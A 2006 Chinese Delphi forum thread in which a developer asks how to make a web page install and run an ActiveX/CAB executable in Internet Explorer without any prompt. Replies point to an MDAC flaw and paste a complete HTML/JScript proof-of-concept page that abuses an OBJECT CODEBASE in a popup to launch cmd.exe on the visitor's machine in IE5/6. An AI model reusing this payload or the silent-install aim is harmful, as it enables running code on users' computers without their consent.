由上网中病毒木马所想到的...与网页中使用ocx,cab包有关。 Delphi / Windows SDK/APIhttp://www.delphi2007.net/DelphiBase/html/delphi_20061218114045129.html
不知你是否有这样的经历,打开了某个网页之后,发现系统中毒了,而你并没有进行任何可疑的操作,仅仅是就打开了一个网页而已。
我曾经就是为了杀毒,去查资料,结果打开一个貌似杀毒介绍的网站,刹那间,机器上多中了10几种病毒。而此时IE并没有提示我有什么插件,是否需要安装等等。
现在的问题就是,我自己做的一个ocx,不管怎么打包,怎么签名,到客户那里都会有提示是否需要下载的,我就奇怪了,有些病毒怎么就那么强悍??
我现在想实现的效果就是,客户端不需要任何提示,第一次下载的时候不需要提示,以后每次运行的时候也不需要提示,而且IE的安全设置就是默认的设置。另外,我还想实现自动下载cab包完毕之后,自动运行包内的一个可执行文件。
高手看看是否能实现,或发表点意见,我不是想做病毒,而是想把b/s结构的软件优化一下,让他智能点。
这个想法已经很久了,试验了很久也没能实现!
那些病毒不是OCX,而是EXE文件。
那么他怎么让你的机器运行那些exe文件的??
ie6以前的版本可以实现
是EXE文件是利用了MDAC的一個漏洞
詳細情況請見微軟安全公告:http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx
最新研究报告:
<HTML>
<HEAD>
<TITLE>IE6 security...</TITLE>
<SCRIPT language=JScript>
var programName=new Array(
'c:/windows/system32/cmd.exe',
'c:/winnt/system32/cmd.exe',
'c:/cmd.exe'
);
function Init(){
var oPopup=window.createPopup();
var oPopBody=oPopup.document.body;
var n,html='';
for(n=0;n<programName.length;n++)
html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
oPopBody.innerHTML=html;
oPopup.show(290, 190, 200, 200, document.body);
}
</SCRIPT>
</head>
<BODY onload="Init()">
<p>
This page doesn't do anything malicious(这个页面没有任何恶意), but is a demonstration of how to execute a program on a remote machine using the
marvelously secure Internet Explorer web browser!!(但它演示了如何在一个远程机上使用令人惊异的安全的IE浏览器执行一个程序!!有点讽刺微软的IE的味道,即通过IE执行客户端机中的程序)
</p>
<p>
Up until at least 18/02/02, this script would open a command window when viewed in IE5/6 under WindowsXP and Win2k (possibly also WinME). There
are currently no patches available using "Windows Update" which will prevent this.
</p>
Delphi中的人气实在不怎么样!!!
去他妈的,自己解决了。
怎么解决的,能不能告知